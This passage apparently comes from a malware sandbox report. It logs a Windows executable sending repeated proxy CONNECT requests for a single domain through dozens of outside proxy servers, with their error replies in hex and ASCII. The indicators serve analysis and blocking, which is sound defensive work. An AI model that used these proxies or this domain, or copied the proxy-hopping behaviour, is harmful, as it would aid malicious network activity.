                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      99192.168.2.45028723.95.216.90156736812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.058294058 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      100192.168.2.450126103.162.31.91338296812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.058871984 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      101192.168.2.450131146.190.84.209628426812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.072936058 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.787368059 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:17.850025892 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:19.916150093 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      102192.168.2.45010943.255.113.232826812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.086837053 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.849857092 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:18.037537098 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:20.256572008 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.740988016 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.292512894 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.834676981 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:42.740678072 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:00.412390947 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      103192.168.2.44973741.111.243.18806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.087778091 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:19.177978039 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:22.178687096 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:23.020178080 CET520INHTTP/1.1 502 Proxy Error
                                                                                                      Date: Fri, 23 Feb 2024 08:44:45 GMT
                                                                                                      Server: Apache
                                                                                                      Content-Length: 373
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 32 20 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 72 65 63 65 69 76 65 64 20 61 6e 20 69 6e 76 61 6c 69 64 0d 0a 72 65 73 70 6f 6e 73 65 20 66 72 6f 6d 20 61 6e 20 75 70 73 74 72 65 61 6d 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 0d 0a 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 3c 70 3e 52 65 61 73 6f 6e 3a 20 3c 73 74 72 6f 6e 67 3e 44 4e 53 20 6c 6f 6f 6b 75 70 20 66 61 69 6c 75 72 65 20 66 6f 72 3a 20 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 70 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>502 Proxy Error</title></head><body><h1>Proxy Error</h1><p>The proxy server received an invalidresponse from an upstream server.<br />The proxy server could not handle the request<p>Reason: <strong>DNS lookup failure for: heygirlisheeverythingyouwantedinaman.com</strong></p></p></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      104192.168.2.45020237.156.28.4331286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.092963934 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:17.221371889 CET71INHTTP/1.1 200 OK
                                                                                                      date: Fri, 23 Feb 2024 08:45:01 GMT
                                                                                                      server: envoy


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      105192.168.2.450291132.148.154.97109586812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.099946022 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      106192.168.2.45014343.231.22.229806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.100191116 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.438801050 CET343INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.14.0 (Ubuntu)
                                                                                                      Date: Fri, 23 Feb 2024 08:45:16 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 182
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      107192.168.2.450327104.16.25.216806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.100558996 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.188162088 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:16 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      108192.168.2.449752184.181.217.20141456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.102291107 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      109192.168.2.45028645.43.71.14767456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.112128973 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.404040098 CET459INHTTP/1.1 407 Proxy Authentication Required
                                                                                                      Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization."
                                                                                                      Proxy-Connection: close
                                                                                                      X-Webshare-Error: 407
                                                                                                      X-Webshare-Reason: invalidpassword
                                                                                                      Date: Fri, 23 Feb 2024 08:45:16 GMT
                                                                                                      Content-Length: 121
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e
                                                                                                      Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      110192.168.2.450268185.38.111.180806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.116312981 CET113OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Feb 23, 2024 09:45:16.303313017 CET75INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 23 Feb 2024 08:45:16 GMT
                                                                                                      Content-Length: 0
                                                                                                      Feb 23, 2024 09:45:16.880831957 CET75INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 23 Feb 2024 08:45:16 GMT
                                                                                                      Content-Length: 0
                                                                                                      Feb 23, 2024 09:45:16.958709002 CET103INHTTP/1.1 400 Bad Request
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close
                                                                                                      Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                      Data Ascii: 400 Bad Request


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      111192.168.2.45034845.12.31.3806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.166740894 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.254045010 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:16 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      112192.168.2.45021147.56.110.20489896812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.166740894 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.473196030 CET309INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.16.1
                                                                                                      Date: Fri, 23 Feb 2024 08:31:54 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 157
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      113192.168.2.450369203.30.189.103806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.168783903 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.256340027 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:16 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      114192.168.2.450325167.71.5.8331286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.171825886 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.397851944 CET28INHTTP/1.1 400 Bad Request


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      115192.168.2.450214149.28.141.180652016812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.172734022 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:45.315337896 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                                      Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      116192.168.2.450372172.67.250.212806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.173682928 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.260608912 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:16 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      117192.168.2.45023620.205.61.14381236812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.238692999 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.551429033 CET319INHTTP/1.1 403 Forbidden
                                                                                                      Server: squid
                                                                                                      Mime-Version: 1.0
                                                                                                      Date: Fri, 23 Feb 2024 08:45:16 GMT
                                                                                                      Content-Type: text/html;charset=utf-8
                                                                                                      Content-Length: 17
                                                                                                      X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                                      X-Cache: MISS from cdn-fintech.info
                                                                                                      X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                                                      Connection: keep-alive
                                                                                                      Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                                                      Data Ascii: ERR_ACCESS_DENIED


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      118192.168.2.450400185.162.228.128806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:16.240154028 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:16.328059912 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:16 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
